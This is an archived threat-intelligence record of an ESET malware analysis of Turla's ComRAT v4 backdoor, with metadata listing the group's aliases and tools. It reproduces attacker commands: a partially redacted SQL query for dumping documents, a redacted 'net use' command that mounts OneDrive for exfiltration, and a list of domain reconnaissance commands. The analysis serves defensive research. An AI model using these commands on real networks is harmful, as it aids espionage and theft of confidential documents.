{
	"id": "650d3276-1d93-4f24-94db-30e709b12e44",
	"created_at": "2026-04-06T00:19:04.368904Z",
	"updated_at": "2026-04-10T03:33:36.043467Z",
	"deleted_at": null,
	"sha1_hash": "e858aa0773d6c6cb14878ec9f5e360f24c124c80",
	"title": "From Agent.BTZ to ComRAT v4: A ten-year journey",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 134434,
	"plain_text": "From Agent.BTZ to ComRAT v4: A ten-year journey\r\nBy Matthieu Faou\r\nArchived: 2026-04-05 18:54:11 UTC\r\nESET researchers have found a new version of one of the oldest malware families run by the Turla group, ComRAT.\r\nTurla, also known as Snake, is an infamous espionage group that has been active for more than ten years. We have\r\npreviously described many campaigns attributed to this group.\r\nComRAT, also known as Agent.BTZ and to its developers as Chinch, is a Remote Access Trojan (RAT) that became\r\ninfamous after its use in a breach of the US military in 2008. The first version of this malware, likely released in\r\n2007, exhibited worm capabilities by spreading through removable drives. From 2007 to 2012, two new major\r\nversions of the RAT were released. Interestingly, both employed the well-known Turla XOR key:\r\n1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s\r\nUntil mid-2017, the Turla developers made a few changes to ComRAT, but these variants were apparently still\r\nderived from the same code base.\r\nThen, in 2017, we noticed that a very different version of ComRAT had been released. This new version used a\r\ncompletely new code base and was far more complex than its predecessors. Here are the main characteristics of this\r\nmalware family:\r\nComRAT v4 was first seen in 2017 and known still to be in use as recently as January 2020.\r\nWe identified at least three targets: two Ministries of Foreign Affairs and a national parliament.\r\nComRAT was used to exfiltrate sensitive documents. The operators used public cloud services such as\r\nOneDrive and 4shared to exfiltrate data.\r\nComRAT is a complex backdoor developed in C++.\r\nComRAT uses a Virtual FAT16 File System.\r\nComRAT is deployed using existing access methods, such as the PowerStallion PowerShell backdoor.\r\nComRAT has two Command and Control channels\r\nHTTP: It uses exactly the same protocol as ComRAT v3\r\nEmail: It uses the Gmail web interface to receive commands and exfiltrate data\r\nComRAT can perform many actions on the compromised computers, such as executing additional programs or\r\nexfiltrating files.\r\nAttribution to Turla\r\nBased on the victimology and the TTPs, we believe that ComRAT is used exclusively by Turla. There are a few\r\nelements linking ComRAT v4 to Turla:\r\nIt uses the same internal name, Chinch, as the previous versions\r\nIt uses the same custom C\u0026C protocol over HTTP as ComRAT v3\r\nA part of the network infrastructure is shared with another Turla malware family, Mosquito\r\nhttps://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/\r\nPage 1 of 7\n\nIt was dropped by, or has dropped other, Turla malware families:\r\nA customized PowerShell loader\r\nThe PowerStallion backdoor\r\nThe RPC backdoor\r\nInsight into attacker’s activity\r\nDuring our investigation, we were able to gain insights about what Turla operators were doing on the compromised\r\nmachines.\r\nThe main use of ComRAT is stealing confidential documents. In one case, its operators even deployed a .NET\r\nexecutable to interact with the victim’s central MS SQL Server database containing the organization’s documents.\r\nFigure 1 is the redacted SQL command.\r\nsqlCommand.CommandText = \"select top \" + num2.ToString() + \" filename, img, datalength(img), id from \u003cRedacted\u003e wi\r\nsqlCommand.CommandText += \" and datalength(img)\u003c1500000 and (filename like '%.doc' or filename like '%.docx' or fil\r\nsqlCommand.CommandText += \" order by id\";\r\nFigure 1. SQL command to dump documents from the central database (partially redacted)\r\nThese documents were then compressed and exfiltrated to a cloud storage provider such as OneDrive or 4shared.\r\nCloud storage is mounted using the net use command as shown in Figure 2.\r\ntracert -h 10 yahoo.com\r\nnet use https://docs.live.net/E65\u003credacted\u003e \u003credacted password\u003e /u:\u003credacted\u003e@aol.co.uk\r\ntracert -h 10 yahoo.com\r\nFigure 2. Command to mount a OneDrive folder using net use (partially redacted)\r\nIn addition to document stealing, the operators also run many commands to gather information about the Active\r\nDirectory groups or users, the network, or Microsoft Windows configurations such as the group policies. Figure 3 is a\r\nlist of commands executed by Turla operators.\r\ngpresult /z\r\ngpresult /v\r\ngpresult\r\nnet view\r\nnet view /domain\r\nnetstat\r\nnetstat -nab\r\nnetstat -nao\r\nnslookup 127.0.0.1\r\nipconfig /all\r\narp -a\r\nnet share\r\nnet use\r\nhttps://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/\r\nPage 2 of 7\n\nsysteminfo\r\nnet user\r\nnet user administrator\r\nnet user /domain\r\nnet group\r\nnet group /domain\r\nnet localgroup\r\nnet localgroup\r\nnet localgroup Administrators\r\nnet group \"Domain Computers\" /domain\r\nnet group \"Domain Admins\" /domain\r\nnet group \"Domain Controllers\" /domain\r\ndir \"%programfiles%\"\r\nnet group \"Exchange Servers\" /domain\r\nnet accounts\r\nnet accounts /domain\r\nnet view 127.0.0.1 /all\r\nnet session\r\nroute print\r\nipconfig /displaydns\r\nFigure 3. Basic recon of the compromised machine\r\nFinally, we also noticed that Turla operators are aware of and try to evade security software. For instance, they\r\nregularly exfiltrate security-related log files in order to understand whether their malware samples have been\r\ndetected. This shows the level of sophistication of this group and its intention to stay on the same machines for a long\r\ntime.\r\nTechnical analysis\r\nAccording to its compilation timestamp, which is likely genuine, the first known sample of ComRAT v4 was\r\ncompiled in April 2017. The most recent iteration of the backdoor we’ve seen was, to the best of our knowledge,\r\ncompiled in November 2019.\r\nBased on ESET telemetry, we believe that ComRAT is installed using an existing foothold such as compromised\r\ncredentials or via another Turla backdoor. For instance, we've seen ComRAT installed by PowerStallion, their\r\nPowerShell-based backdoor we described in 2019.\r\nThe ComRAT installer is a PowerShell script that creates a Windows scheduled task and fills a Registry value with\r\nthe encrypted payload.\r\nComRAT v4 has several components:\r\nan orchestrator, injected into explorer.exe. It controls most of ComRAT functions including the execution of\r\nbackdoor commands.\r\na communication module (a DLL), injected into the default browser by the orchestrator. It communicates with\r\nthe orchestrator using a named pipe.\r\nhttps://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/\r\nPage 3 of 7\n\na Virtual FAT16 File System, containing the configuration and the logs files.\r\nFigure 4 is an overview of ComRAT’s architecture.\r\nFigure 4. Summary of ComRAT architecture\r\nComRAT v4 has two different C\u0026C channels: HTTP (known internally as legacy), which (surprise surprise) uses the\r\nHTTP protocol, and email (known internally as mail), which uses the Gmail web interface.\r\nhttps://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/\r\nPage 4 of 7\n\nIn the latter mode and using cookies stored in the configuration, it connects to the Gmail web interface in order to\r\ncheck the inbox and download specific mail attachments that contain encrypted commands. These commands are sent\r\nby the malware operators from another address, generally hosted on a different free email provider such as GMX.\r\nA detailed technical analysis of all ComRAT’s components is available in the white paper.\r\nConclusion\r\nComRAT v4 is a totally revamped malware family released in 2017. Its developers took inspiration from other Turla\r\nbackdoors, such as Snake, to build a very complex piece of malware.\r\nIts most interesting feature is the use of the Gmail web UI to receive commands and exfiltrate data. Thus, it is able to\r\nbypass some security controls because it doesn’t rely on any malicious domain. We also noticed that this new version\r\nabandoned the use of COM object hijacking for persistence, the method that gave the malware its common name.\r\nWe found indications that ComRAT v4 was still in use at the beginning of 2020, showing that the Turla group is still\r\nvery active and a major threat for diplomats and militaries.\r\nA full and comprehensive list of Indicators of Compromise (IoCs) and samples can be found in the full white paper\r\nand in our GitHub repository.\r\nFor a detailed analysis of the backdoor, refer to our white paper. For any inquiries, or to make sample submissions\r\nrelated to the subject, contact us at threatintel@eset.com.\r\nMITRE ATT\u0026CK techniques\r\nTactic Id Name Description\r\nExecution T1086 PowerShell A PowerShell script is used to install ComRAT.\r\nPersistence T1053\r\nScheduled\r\nTask\r\nComRAT uses a scheduled task to launch its PowerShell loader.\r\nDefense\r\nEvasion\r\nT1027\r\nObfuscated\r\nFiles or\r\nInformation\r\nThe ComRAT orchestrator is stored encrypted and only decrypted\r\nupon execution.\r\nT1055\r\nProcess\r\nInjection\r\nThe ComRAT orchestrator is injected into explorer.exe . The\r\ncommunication DLL is injected into the default browser.\r\nT1112\r\nModify\r\nRegistry\r\nThe ComRAT orchestrator is stored encrypted in the Registry.\r\nDiscovery\r\nT1016\r\nSystem\r\nNetwork\r\nConfiguration\r\nDiscovery\r\nOperators execute ipconfig and nbstat .\r\nhttps://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/\r\nPage 5 of 7\n\nTactic Id Name Description\r\nT1033\r\nSystem\r\nOwner/User\r\nDiscovery\r\nOperators execute net user .\r\nT1069\r\nPermission\r\nGroups\r\nDiscovery\r\nOperators execute net group /domain .\r\nT1082\r\nSystem\r\nInformation\r\nDiscovery\r\nOperators execute systeminfo .\r\nT1083\r\nFile and\r\nDirectory\r\nDiscovery\r\nOperators list the content of several directories. Example: dir /og-d\r\n\"%userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*.*\"\r\n.\r\nT1087\r\nAccount\r\nDiscovery\r\nOperators execute net user and net group .\r\nT1120\r\nPeripheral\r\nDevice\r\nDiscovery\r\nOperators execute fsutil fsinfo drives to list the connected drives.\r\nT1135\r\nNetwork\r\nShare\r\nDiscovery\r\nOperators execute net view .\r\nCollection T1213\r\nData from\r\nInformation\r\nRepositories\r\nThe Operators use a custom tool to exfiltrate documents from an\r\ninternal central database.\r\nCommand\r\nand\r\nControl\r\nT1024\r\nCustom\r\nCryptographic\r\nProtocol\r\nComRAT uses RSA and AES to encrypt C\u0026C data.\r\nT1043\r\nCommonly\r\nUsed Port\r\nComRAT uses ports 80 and 443.\r\nT1071\r\nStandard\r\nApplication\r\nLayer\r\nProtocol\r\nComRAT uses HTTP and HTTPS.\r\nT1102 Web Service ComRAT can be controlled via the Gmail web UI.\r\nhttps://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/\r\nPage 6 of 7\n\nTactic Id Name Description\r\nExfiltration T1002\r\nData\r\nCompressed\r\nThe documents are compressed in a RAR archive.\r\nT1022\r\nData\r\nEncrypted\r\nThe RAR\r\narchive is\r\nencrypted\r\nwith a\r\npassword.\r\nT1048\r\nExfiltration\r\nOver\r\nAlternative\r\nProtocol\r\nData is\r\nexfiltrated to\r\ncloud storage,\r\nmounted\r\nlocally using\r\nthe net use\r\ncommand.\r\nSource: https://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/\r\nhttps://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/"
	],
	"report_names": [
		"agentbtz-comratv4-ten-year-journey"
	],
	"threat_actors": [
		{
			"id": "8aaa5515-92dd-448d-bb20-3a253f4f8854",
			"created_at": "2024-06-19T02:03:08.147099Z",
			"updated_at": "2026-04-10T02:00:03.685355Z",
			"deleted_at": null,
			"main_name": "IRON HUNTER",
			"aliases": [
				"ATK13 ",
				"Belugasturgeon ",
				"Blue Python ",
				"CTG-8875 ",
				"ITG12 ",
				"KRYPTON ",
				"MAKERSMARK ",
				"Pensive Ursa ",
				"Secret Blizzard ",
				"Turla",
				"UAC-0003 ",
				"UAC-0024 ",
				"UNC4210 ",
				"Venomous Bear ",
				"Waterbug "
			],
			"source_name": "Secureworks:IRON HUNTER",
			"tools": [
				"Carbon-DLL",
				"ComRAT",
				"LightNeuron",
				"Mosquito",
				"PyFlash",
				"Skipper",
				"Snake",
				"Tavdig"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac",
			"created_at": "2022-10-25T16:07:24.349252Z",
			"updated_at": "2026-04-10T02:00:04.949821Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"ATK 13",
				"Belugasturgeon",
				"Blue Python",
				"CTG-8875",
				"G0010",
				"Group 88",
				"ITG12",
				"Iron Hunter",
				"Krypton",
				"Makersmark",
				"Operation Epic Turla",
				"Operation Moonlight Maze",
				"Operation Penguin Turla",
				"Operation Satellite Turla",
				"Operation Skipper Turla",
				"Operation Turla Mosquito",
				"Operation WITCHCOVEN",
				"Pacifier APT",
				"Pensive Ursa",
				"Popeye",
				"SIG15",
				"SIG2",
				"SIG23",
				"Secret Blizzard",
				"TAG-0530",
				"Turla",
				"UNC4210",
				"Venomous Bear",
				"Waterbug"
			],
			"source_name": "ETDA:Turla",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"ATI-Agent",
				"AdobeARM",
				"Agent.BTZ",
				"Agent.DNE",
				"ApolloShadow",
				"BigBoss",
				"COMpfun",
				"Chinch",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobra Carbon System",
				"ComRAT",
				"DoublePulsar",
				"EmPyre",
				"EmpireProject",
				"Epic Turla",
				"EternalBlue",
				"EternalRomance",
				"GoldenSky",
				"Group Policy Results Tool",
				"HTML5 Encoding",
				"HyperStack",
				"IcedCoffee",
				"IronNetInjector",
				"KSL0T",
				"Kapushka",
				"Kazuar",
				"KopiLuwak",
				"Kotel",
				"LOLBAS",
				"LOLBins",
				"LightNeuron",
				"Living off the Land",
				"Maintools.js",
				"Metasploit",
				"Meterpreter",
				"MiamiBeach",
				"Mimikatz",
				"MiniDionis",
				"Minit",
				"NBTscan",
				"NETTRANS",
				"NETVulture",
				"Neptun",
				"NetFlash",
				"NewPass",
				"Outlook Backdoor",
				"Penquin Turla",
				"Pfinet",
				"PowerShell Empire",
				"PowerShellRunner",
				"PowerShellRunner-based RPC backdoor",
				"PowerStallion",
				"PsExec",
				"PyFlash",
				"QUIETCANARY",
				"Reductor RAT",
				"RocketMan",
				"SMBTouch",
				"SScan",
				"Satellite Turla",
				"SilentMoon",
				"Sun rootkit",
				"TTNG",
				"TadjMakhal",
				"Tavdig",
				"TinyTurla",
				"TinyTurla Next Generation",
				"TinyTurla-NG",
				"Topinambour",
				"Tunnus",
				"Turla",
				"Turla SilentMoon",
				"TurlaChopper",
				"Uroburos",
				"Urouros",
				"WCE",
				"WITCHCOVEN",
				"WhiteAtlas",
				"WhiteBear",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Wipbot",
				"WorldCupSec",
				"XTRANS",
				"certutil",
				"certutil.exe",
				"gpresult",
				"nbtscan",
				"nbtstat",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a97fee0d-af4b-4661-ae17-858925438fc4",
			"created_at": "2023-01-06T13:46:38.396415Z",
			"updated_at": "2026-04-10T02:00:02.957137Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"TAG_0530",
				"Pacifier APT",
				"Blue Python",
				"UNC4210",
				"UAC-0003",
				"VENOMOUS Bear",
				"Waterbug",
				"Pfinet",
				"KRYPTON",
				"Popeye",
				"SIG23",
				"ATK13",
				"ITG12",
				"Group 88",
				"Uroburos",
				"Hippo Team",
				"IRON HUNTER",
				"MAKERSMARK",
				"Secret Blizzard",
				"UAC-0144",
				"UAC-0024",
				"G0010"
			],
			"source_name": "MISPGALAXY:Turla",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3",
			"created_at": "2022-10-25T15:50:23.509601Z",
			"updated_at": "2026-04-10T02:00:05.277674Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"Turla",
				"IRON HUNTER",
				"Group 88",
				"Waterbug",
				"WhiteBear",
				"Krypton",
				"Venomous Bear",
				"Secret Blizzard",
				"BELUGASTURGEON"
			],
			"source_name": "MITRE:Turla",
			"tools": [
				"PsExec",
				"nbtstat",
				"ComRAT",
				"netstat",
				"certutil",
				"KOPILUWAK",
				"IronNetInjector",
				"LunarWeb",
				"Arp",
				"Uroburos",
				"PowerStallion",
				"Kazuar",
				"Systeminfo",
				"LightNeuron",
				"Mimikatz",
				"Tasklist",
				"LunarMail",
				"HyperStack",
				"NBTscan",
				"TinyTurla",
				"Penquin",
				"LunarLoader"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434744,
	"ts_updated_at": 1775792016,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e858aa0773d6c6cb14878ec9f5e360f24c124c80.pdf",
		"text": "https://archive.orkl.eu/e858aa0773d6c6cb14878ec9f5e360f24c124c80.txt",
		"img": "https://archive.orkl.eu/e858aa0773d6c6cb14878ec9f5e360f24c124c80.jpg"
	}
}